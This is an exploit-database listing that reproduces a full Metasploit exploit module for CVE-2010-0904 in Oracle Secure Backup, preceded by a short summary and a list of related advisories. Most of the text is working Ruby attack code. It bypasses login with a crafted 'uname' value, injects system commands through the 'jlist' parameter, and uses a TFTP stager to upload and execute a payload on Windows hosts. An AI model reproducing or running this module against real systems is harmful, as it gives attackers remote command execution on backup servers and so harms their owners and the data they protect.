Oracle Secure Backup Authentication Bypass/Command Injection

🗓️ 19 Aug 2011 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 23 Views

Oracle Secure Backup Authentication Bypass/Command Injection module exploits an authentication bypass vulnerability in login.php. The 'jlist' parameter in property_box.php can execute arbitrary system commands. Tested against Oracle Secure Backup version 10.3.0.1.

Reporter	Title	Published	Views	Family All 19
Circl	CVE-2010-0904	19 Aug 201100:00	–	circl
Check Point Advisories	Oracle Secure Backup Administration Server uname Var Authentication Bypass (CVE-2010-0904)	16 Aug 201000:00	–	checkpoint_advisories
CVE	CVE-2010-0904	13 Jul 201022:07	–	cve
Cvelist	CVE-2010-0904	13 Jul 201022:07	–	cvelist
Exploit DB	Oracle Secure Backup - Authentication Bypass/Command Injection (Metasploit)	19 Aug 201100:00	–	exploitdb
Metasploit	Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability	20 Jul 201021:57	–	metasploit
Metasploit	Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability	19 Aug 201118:35	–	metasploit
NVD	CVE-2010-0904	13 Jul 201022:30	–	nvd
Oracle	Oracle Critical Patch Update Advisory - July 2010	13 Jul 201000:00	–	oracle
Oracle	Security \| Oracle Critical Patch Update - July 2010	13 Jul 201000:00	–	oracle

##
# $Id: osb_uname_jlist.rb 13591 2011-08-19 18:35:29Z mc $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking
 
    include Msf::Exploit::CmdStagerTFTP
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
            'Description'    => %q{
                    This module exploits an authentication bypass vulnerability
                in login.php. In conjuction with the authentication bypass issue,
                the 'jlist' parameter in property_box.php can be used to execute
                arbitrary system commands.
                This module was tested against Oracle Secure Backup version 10.3.0.1.0
            },
            'Author'         => [ 'MC' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 13591 $',
            'References'     =>
                [
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ],
                    [ 'CVE', '2010-0904' ],
                    # the jlist vector has not been disclosed or has it?
                ],
            'Targets'   =>
                [
                    [ 'Windows Universal',
                        {
                            'Arch' => ARCH_X86,
                            'Platform' => 'win'
                        }
                    ]
                ],
            'Privileged' => 'true',
            'Platform' => 'win',
            'DisclosureDate' => 'Jul 13 2010',
            'DefaultTarget' => 0))
 
        register_options(
            [
                Opt::RPORT(443),
                OptBool.new('SSL',   [true, 'Use SSL', true]),
                OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
            ], self.class)
    end
 
    def windows_stager
 
        exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
         
        print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
        execute_cmdstager({ :temp => '.'})
        @payload_exe = payload_exe
         
        print_status("Attempting to execute the payload...")
        execute_command(@payload_exe)
     
    end
 
    def execute_command(cmd, opts = {})
 
        res = send_request_cgi(
            {
                'uri'   =>  '/login.php',
                'data'  =>  'attempt=1&uname=-',
                'method' => 'POST',
            }, 5)
 
        if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
            sessionid = res.headers['Set-Cookie'].split(';')[0]
 
            data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)
         
            send_request_raw(
                {
                    'uri'   => '/property_box.php' + data,
                    'cookie' => sessionid,
                    'method' => 'GET',
                }, 5)
 
        else
            print_error("Invalid PHPSESSION token..")
            return
        end
    end
 
    def exploit
 
        if not datastore['CMD'].empty?
            print_status("Executing command '#{datastore['CMD']}'")
            execute_command(datastore['CMD'])
            return
        end
 
        case target['Platform']
            when 'win'
                windows_stager
            else
                raise RuntimeError, 'Target not supported.'
        end
 
        handler
     
    end
end
__END__
  else if (strcmp($type, "Job") == 0)
    {
    if (!is_array($objectname))
      $objectname = array();
    reset($objectname);
    while (list(,$oname) = each($objectname))
      {
      $oname = escapeshellarg($oname);
      $jlist = "$jlist $oname";
      }
    if (strlen($jlist) > 0)
      $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");



#  0day.today [2018-03-19]  #

19 Aug 2011 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.88044